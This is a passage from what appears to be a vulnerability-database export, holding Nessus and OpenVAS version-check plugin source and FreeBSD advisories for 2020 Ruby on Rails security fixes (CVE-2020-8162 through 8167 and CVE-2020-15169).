(openSUSE-2020-1536)\");\n script_summary(english:\"Check for the openSUSE-2020-1536 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rubygem-actionpack-5_1 fixes the following issues :\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in\n ActionPack. There is a strong parameters bypass vector\n in ActionPack. (bsc#1172177)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172177\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rubygem-actionpack-5_1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-actionpack-doc-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ruby2.5-rubygem-actionpack-5_1-5.1.4-lp152.5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ruby2.5-rubygem-actionpack-doc-5_1-5.1.4-lp152.5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-actionpack-5_1 / ruby2.5-rubygem-actionpack-doc-5_1\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:11:35", "description": "This update for rubygem-activesupport-5_1 fixes the following issues :\n\n - CVE-2020-8165: Fixed deserialization of untrusted data in MemCacheStore potentially resulting in remote code execution (bsc#1172186)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2020-10-19T00:00:00", "type": "nessus", "title": "openSUSE Security Update : rubygem-activesupport-5_1 (openSUSE-2020-1677)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165"], "modified": "2020-10-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-5_1", "p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-doc-5_1", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1677.NASL", "href": "https://www.tenable.com/plugins/nessus/141506", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1677.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141506);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/21\");\n\n script_cve_id(\"CVE-2020-8165\");\n\n script_name(english:\"openSUSE Security Update : rubygem-activesupport-5_1 (openSUSE-2020-1677)\");\n script_summary(english:\"Check for the openSUSE-2020-1677 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for rubygem-activesupport-5_1 fixes the following issues :\n\n - CVE-2020-8165: Fixed deserialization of untrusted data\n in MemCacheStore potentially resulting in remote code\n execution (bsc#1172186)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172186\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected rubygem-activesupport-5_1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.5-rubygem-activesupport-doc-5_1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ruby2.5-rubygem-activesupport-5_1-5.1.4-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"ruby2.5-rubygem-activesupport-doc-5_1-5.1.4-lp151.3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby2.5-rubygem-activesupport-5_1 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:24:01", "description": "Upgrade to Ruby on Rails 6.0.3.3. Fixes CVEs: #1877568 #1831529 #1852381\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-10-08T00:00:00", "type": "nessus", "title": "Fedora 33 : 1:rubygem-actionmailer / 1:rubygem-actionpack / etc (2020-4dd34860a3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15169", "CVE-2020-5267", "CVE-2020-8185"], "modified": "2020-10-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:rubygem-actionmailer", "p-cpe:/a:fedoraproject:fedora:1:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:1:rubygem-activerecord", "p-cpe:/a:fedoraproject:fedora:1:rubygem-activesupport", "p-cpe:/a:fedoraproject:fedora:1:rubygem-rails", "p-cpe:/a:fedoraproject:fedora:rubygem-actioncable", "p-cpe:/a:fedoraproject:fedora:rubygem-actionmailbox", "p-cpe:/a:fedoraproject:fedora:rubygem-actiontext", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "p-cpe:/a:fedoraproject:fedora:rubygem-activejob", "p-cpe:/a:fedoraproject:fedora:rubygem-activemodel", "p-cpe:/a:fedoraproject:fedora:rubygem-activestorage", "p-cpe:/a:fedoraproject:fedora:rubygem-image_processing", "p-cpe:/a:fedoraproject:fedora:rubygem-railties", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2020-4DD34860A3.NASL", "href": "https://www.tenable.com/plugins/nessus/141285", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-4dd34860a3.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141285);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/12\");\n\n script_cve_id(\"CVE-2020-15169\", \"CVE-2020-5267\", \"CVE-2020-8185\");\n script_xref(name:\"FEDORA\", value:\"2020-4dd34860a3\");\n\n script_name(english:\"Fedora 33 : 1:rubygem-actionmailer / 1:rubygem-actionpack / etc (2020-4dd34860a3)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Upgrade to Ruby on Rails 6.0.3.3. Fixes CVEs: #1877568 #1831529\n#1852381\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-4dd34860a3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15169\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actioncable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionmailbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actiontext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activestorage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-image_processing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-actionmailer-6.0.3.3-1.fc33\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-actionpack-6.0.3.3-2.fc33\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-activerecord-6.0.3.3-1.fc33\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-activesupport-6.0.3.3-1.fc33\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-rails-6.0.3.3-1.fc33\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-actioncable-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-actionmailbox-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-actiontext-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-actionview-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-activejob-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-activemodel-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-activestorage-6.0.3.3-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-image_processing-1.11.0-1.fc33\")) flag++;\nif (rpm_check(release:\"FC33\", reference:\"rubygem-railties-6.0.3.3-1.fc33\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:rubygem-actionmailer / 1:rubygem-actionpack / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "freebsd": [{"lastseen": "2023-06-06T15:28:27", "description": "\n\nRuby on Rails blog:\n\nHi everyone! Rails 5.2.4.3 and 6.0.3.1 have been released! These releases contain important security fixes, so please upgrade when you can.\nBoth releases contain the following fixes:\nCVE-2020-8162: Circumvention of file size limits in ActiveStorage\nCVE-2020-8164: Possible Strong Parameters Bypass in ActionPack\nCVE-2020-8165: Potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore\nCVE-2020-8166: Ability to forge per-form CSRF tokens given a global CSRF token\nCVE-2020-8167: CSRF Vulnerability in rails-ujs\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "freebsd", "title": "Rails -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167"], "modified": "2020-05-18T00:00:00", "id": "85FCA718-99F6-11EA-BF1D-08002728F74C", "href": "https://vuxml.freebsd.org/freebsd/85fca718-99f6-11ea-bf1d-08002728f74c.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:28:27", "description": "\n\nRuby on Rails blog:\n\nRails 5.2.4.4 and 6.0.3.3 have been released! These releases contain an\n\t important security fix, so please upgrade when you can.\nBoth releases contain the following fix: [CVE-2020-15169] Potential XSS\n\t vulnerability in Action View\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-09T00:00:00", "type": "freebsd", "title": "Rails -- Potential XSS vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-09-09T00:00:00", "id": "7B630362-F468-11EA-A96C-08002728F74C", "href": "https://vuxml.freebsd.org/freebsd/7b630362-f468-11ea-a96c-08002728f74c.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-07-21T20:10:01", "description": "Ruby on Rails is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-06-29T00:00:00", "type": "openvas", "title": "Ruby on Raily < 5.2.4.3, 6.x < 6.0.3.1 Multiple Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165", "CVE-2020-8167", "CVE-2020-8164", "CVE-2020-8162"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310113712", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113712", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113712\");\n script_version(\"2020-07-14T14:24:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:24:25 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-29 11:40:59 +0000 (Mon, 29 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-8162\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8167\");\n\n script_name(\"Ruby on Raily < 5.2.4.3, 6.x < 6.0.3.1 Multiple Vulnerabilities (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Ruby on Rails is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The Content-Length parameter of a direct file upload may be modified\n by an attacker to bypass upload limitations.\n\n - A deserialization vulnerability may allow an attacker to read sensitive information.\n\n - An attacker may unmarshal user-provided objects in MemCacheStore\n and RedisCacheStore resulting in arbitrary code execution.\n\n - A cross-site request forgery (CSRF) vulnerability in the rails-ujs module\n may allow an attacker to perform actions in the context of another user.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails through version 5.2.4.2 and versions 6.0.0.0 through 6.0.3.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.2.4.3 or 6.0.3.1 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released/\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/789579\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/292797\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/413388\");\n script_xref(name:\"URL\", value:\"https://hackerone.com/reports/189878\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less( version: version, test_version: \"5.2.4.3\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.2.4.3\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"6.0.0.0\", test_version2: \"6.0.3.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"6.0.3.1\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T20:10:01", "description": "Ruby on Rails is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-06-29T00:00:00", "type": "openvas", "title": "Ruby on Raily < 5.2.4.3, 6.x < 6.0.3.1 Multiple Vulnerabilities (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8165", "CVE-2020-8167", "CVE-2020-8164", "CVE-2020-8162"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310113709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113709", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113709\");\n script_version(\"2020-07-14T14:24:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:24:25 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-29 11:40:59 +0000 (Mon, 29 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2020-8162\", \"CVE-2020-8164\", \"CVE-2020-8165\", \"CVE-2020-8167\");\n\n script_name(\"Ruby on Raily < 5.2.4.3, 6.x < 6.0.3.1 Multiple Vulnerabilities (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Ruby on Rails is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The Content-Length parameter of a direct file upload may be modified\n by an attacker to bypass upload limitations.\n\n - A deserialization vulnerability may allow an attacker to read sensitive information.\n\n - An attacker may unmarshal 